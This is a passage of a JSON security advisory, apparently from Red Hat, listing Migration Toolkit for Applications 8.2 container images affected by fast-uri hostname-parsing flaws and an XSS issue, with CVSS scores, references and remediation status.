"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "fast-uri: fast-uri: URI authority bypass due to improper delimiter handling"
},
{
"cve": "CVE-2026-13676",
"cwe": {
"id": "CWE-551",
"name": "Incorrect Behavior Order: Authorization Before Parsing and Canonicalization"
},
"discovery_date": "2026-06-29T14:01:55.592330+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2494197"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in fast-uri. This vulnerability occurs because fast-uri fails to properly convert Unicode (Internationalized Domain Name - IDN) hostnames for HTTP-family URLs. This can lead to a situation where security policies, such as denylists or redirect validations, are bypassed when applications use fast-uri to enforce these policies before passing the URL to another parser. A remote attacker could exploit this to circumvent security controls and potentially access unauthorized resources or perform malicious redirects.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "fast-uri: fast-uri: Security policy bypass due to improper Unicode hostname canonicalization",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This Important flaw in `fast-uri` allows a remote attacker to bypass host-based security policies. Applications that rely on `fast-uri` for URL parsing and policy enforcement, such as denylists or redirect validations, can be circumvented due to inconsistent handling of Unicode hostnames. This discrepancy between `fast-uri` and other URL parsers could lead to unauthorized resource access or malicious redirects in affected Red Hat products.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64"
],
"known_not_affected": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-13676"
},
{
"category": "external",
"summary": "RHBZ#2494197",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2494197"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-13676",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-13676"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-13676",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-13676"
},
{
"category": "external",
"summary": "https://cna.openjsf.org/security-advisories.html",
"url": "https://cna.openjsf.org/security-advisories.html"
},
{
"category": "external",
"summary": "https://github.com/fastify/fast-uri/security/advisories/GHSA-4c8g-83qw-93j6",
"url": "https://github.com/fastify/fast-uri/security/advisories/GHSA-4c8g-83qw-93j6"
}
],
"release_date": "2026-06-29T13:22:44.674000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-07-21T22:10:10+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.",
"product_ids": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:43038"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "fast-uri: fast-uri: Security policy bypass due to improper Unicode hostname canonicalization"
},
{
"cve": "CVE-2026-25681",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2026-05-22T16:01:08.177603+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
